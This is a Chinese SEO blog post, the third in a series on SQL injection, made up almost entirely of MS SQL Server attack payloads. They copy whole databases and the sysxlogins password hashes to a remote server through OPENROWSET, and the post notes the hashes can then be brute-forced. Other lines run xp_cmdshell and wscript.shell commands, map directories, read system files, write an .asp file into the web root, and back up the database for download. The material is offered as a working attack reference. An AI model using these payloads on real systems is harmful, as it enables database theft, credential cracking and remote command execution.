sql注射语句3-佛山SEO网站博客,广州SEO专业提供佛山地区seo和广州地区网站优化服务--广州SEO-
欢迎进入佛山SEO博客,佛山百度优化博客,广州SEO博客
« SQL注射语句2佛山SEO观点:网站优化黑猫和白猫的相对论 »

sql注射语句3

3.复制目标主机的整个数据库insert所有远程表到本地表。 
基本语法: 
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 
'select * from table1') select * from table2 
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: 

insert into 
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select 
* from table1') select * from table2 
insert into 
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select 
* from _sysdatabases') 
select * from master.dbo.sysdatabases 
insert into 
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select 
* from _sysobjects') 
select * from user_database.dbo.sysobjects 
insert into 
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select 
* from _syscolumns') 
select * from user_database.dbo.syscolumns 
复制数据库: 
insert into 
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select 
* from table1') select * from database..table1 
insert into 
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select 
* from table2') select * from database..table2 
复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下: 
insert into OPENROWSET('SQLOLEDB', 
'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from 
_sysxlogins') select * from database.dbo.sysxlogins 
得到hash之后,就可以进行暴力破解。 
遍历目录的方法: 先创建一个临时表:temp 
';create table temp(id nvarchar(255),num1 nvarchar(255),num2 
nvarchar(255),num3 nvarchar(255));-- 
';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 
';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 
';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 
获得所有子目录的目录树结构,并寸入temp表中 
';insert into temp(id) exec master.dbo.xp_cmdshell 'type 
c:\web\index.asp';-- 查看某个文件的内容 
';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';-- 
';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';-- 

';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript 
C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc' 
';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 
(xp_dirtree适用权限PUBLIC) 
写入表: 
语句1:and 1=(Select IS_SRVROLEMEMBER('sysadmin'));-- 
语句2:and 1=(Select IS_SRVROLEMEMBER('serveradmin'));-- 
语句3:and 1=(Select IS_SRVROLEMEMBER('setupadmin'));-- 
语句4:and 1=(Select IS_SRVROLEMEMBER('securityadmin'));-- 
语句5:and 1=(Select IS_SRVROLEMEMBER('securityadmin'));-- 
语句6:and 1=(Select IS_SRVROLEMEMBER('diskadmin'));-- 
语句7:and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));-- 
语句8:and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));-- 
语句9:and 1=(Select IS_MEMBER('db_owner'));-- 
把路径写到表中去: 
;create table dirs(paths varchar(100), id int)-- 
;insert dirs exec master.dbo.xp_dirtree 'c:\'-- 
and 0<>(select top 1 paths from dirs)-- 
and 0<>(select top 1 paths from dirs where paths not in(mailto:%20@Inetpub))-- 
;create table dirs1(paths varchar(100), id int)-- 
;insert dirs exec master.dbo.xp_dirtree 'e:\web'-- 
and 0<>(select top 1 paths from dirs1)-- 
把数据库备份到网页目录:下载 
;declare @a sysname; set @a=db_name();backup database @a to 
disk='e:\web\down.bak';-- 
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where 
xtype=char(85)) T order by id desc) 
and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects) 
参看相关表。 
and 1=(select user_id from USER_LOGIN) 
and 0=(select user from USER_LOGIN where user>1) 
-=- wscript.shell example -=- 
declare @o int 
exec sp_oacreate 'wscript.shell', @o out 
exec sp_oamethod @o, 'run', NULL, 'notepad.exe' 
'; declare @o int exec sp_oacreate 'wscript.shell', @o out exec 
sp_oamethod @o, 'run', NULL, 'notepad.exe'-- 
declare @o int, @f int, @t int, @ret int 
declare @line varchar(8000) 
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1 
exec @ret = sp_oamethod @f, 'readline', @line out 
while( @ret = 0 ) 
begin 
print @line 
exec @ret = sp_oamethod @f, 'readline', @line out 
end 
declare @o int, @f int, @t int, @ret int 
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'createtextfile', @f out, 
'c:\inetpub\wwwroot\foo.asp', 1 
exec @ret = sp_oamethod @f, 'writeline', NULL, 
'' 
declare @o int, @ret int 
exec sp_oacreate 'speech.voicetext', @o out 
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' 
exec sp_oasetproperty @o, 'speed', 150 
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong 
to,us', 528 
waitfor delay '00:00:05' 
'; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out 
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty 
@o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel 
servers are belong to us', 528 waitfor delay '00:00:05'-- 
xp_dirtree适用权限PUBLIC 
exec master.dbo.xp_dirtree 'c:\' 
返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

日历

最新评论及回复

最近发表

Powered By 网一科技 1.8 Arwen Build 90619 Code detection by Codefense

Copyright 佛山百度优化,佛山SEO,广州SEO广州网站优化版权所有